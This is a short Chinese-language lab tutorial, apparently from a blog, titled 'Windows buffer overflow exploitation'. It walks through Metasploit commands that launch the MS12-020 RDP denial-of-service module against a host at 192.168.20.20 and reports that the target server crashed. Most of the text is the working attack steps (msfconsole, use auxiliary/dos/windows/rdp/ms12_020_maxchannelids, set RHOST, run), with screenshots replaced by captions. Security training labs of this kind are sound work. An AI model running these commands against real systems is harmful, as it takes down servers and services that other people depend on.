Windows缓冲区溢出漏洞利用

预备知识:

MS12-020漏洞是Server 服务中的漏洞,该漏洞可能允许远程代码执行。

实验工具:

kali metasploit

实验步骤:

第一步:使用 msfconsole ,搜索 ms12-020 攻击模块

msfconsole

Windows缓冲区溢出漏洞利用_第1张图片

search ms12-020

Windows缓冲区溢出漏洞利用_第2张图片


第二步:调用第一个攻击模块(第二个为同攻击的检查模块)

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Windows缓冲区溢出漏洞利用_第3张图片

show options

Windows缓冲区溢出漏洞利用_第4张图片


第三步:设置靶机地址,开始攻击。(192.168.20.20)

set RHOST 192.168.20.20

Windows缓冲区溢出漏洞利用_第5张图片

新开一个终端,并 ping一下 192.168.20.20

ping 192.168.20.20

Windows缓冲区溢出漏洞利用_第6张图片

run

Windows缓冲区溢出漏洞利用_第7张图片

目标靶机已被攻击。服务器宕机。

你可能感兴趣的:(WEB安全,提权方法)